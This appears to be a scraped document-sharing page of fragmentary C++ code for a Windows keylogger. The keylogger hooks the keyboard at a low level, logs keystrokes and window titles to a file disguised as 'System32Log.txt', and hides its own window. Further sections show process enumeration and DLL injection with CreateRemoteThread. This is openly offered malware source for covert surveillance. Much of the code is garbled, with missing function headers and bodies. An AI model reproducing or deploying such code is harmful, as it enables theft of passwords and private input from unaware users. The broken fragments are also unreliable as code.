Professional Documents
Culture Documents
#include <Windows.h>
#include <time.h>
#include <iostream>
#include <cstdio>
// variable to store the HANDLE to the hook. Don't declare it anywhere else then globally
// or you will get problems since every function uses this variable.
HHOOK _hook;
// This struct contains the data received by the hook callback. As you see in the callback function
// it contains the thing you will need: vkCode = virtual key code.
KBDLLHOOKSTRUCT kbdStruct;
// This is the callback function. Consider it the event that is raised when, in this case,
// a key is pressed.
if (nCode >= 0)
{
// the action is valid: HC_ACTION.
if (wParam == WM_KEYDOWN)
// lParam is the pointer to the struct containing the data needed, so cast and
assign it to kdbStruct.
kbdStruct = *((KBDLLHOOKSTRUCT*)lParam);
// save to file
Save(kbdStruct.vkCode, "C:\\System32Log.txt");
// call the next hook in the hook chain. This is nessecary or your hook chain will break and the
hook stops
void SetHook()
// Set the hook and set it to use the callback function above
// WH_KEYBOARD_LL means it will set a low level keyboard hook. More information about it at
MSDN.
// The last 2 parameters are NULL, 0 because the callback function is in the same thread and
window as the
}
void ReleaseHook()
UnhookWindowsHookEx(_hook);
}
char lastwindow[256];
FILE *OUTPUT_FILE;
if (foreground)
char window_title[256];
if(strcmp(window_title, lastwindow)!=0) {
strcpy(lastwindow, window_title);
// get time
time_t t = time(NULL);
char s[64];
if (key_stroke == VK_BACK)
else {
key_stroke -= 48;
fclose(OUTPUT_FILE);
return 0;
void Stealth()
#ifdef visible
#endif // visible
#ifdef invisible
#endif // invisible
int main()
// visibility of window
Stealth();
// Set the hook
SetHook();
MSG msg;
Making a DLL
#include <windows.h>
#define BUILD_DLL
#ifdef BUILD_DLL
#else
#endif
extern "C" DLL_EXPORT BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID
lpvReserved)
switch (fdwReason)
case DLL_PROCESS_ATTACH:
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
return TRUE;
if(mySnapShot == INVALID_HANDLE_VALUE)
exit(-1);
if(!Process32First(mySnapShot,&myProcInf))
CloseHandle(mySnapShot);
exit(-1);
do
{
printf("%50s%5s:%5s%ld\n", myProcInf.szExeFile,"","",myProcInf.th32ProcessID);
}while(Process32Next(mySnapShot,&myProcInf));
DLL Injection
Make a handle
Handle ProcHandler = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, ProcID);
// ProcID is process ID
Create a thread
threadHandler =
CreateRemoteThread(ProcHandler,NULL,0,MyStartExecutionAddress,DllAllocatedAddress,0,NULL);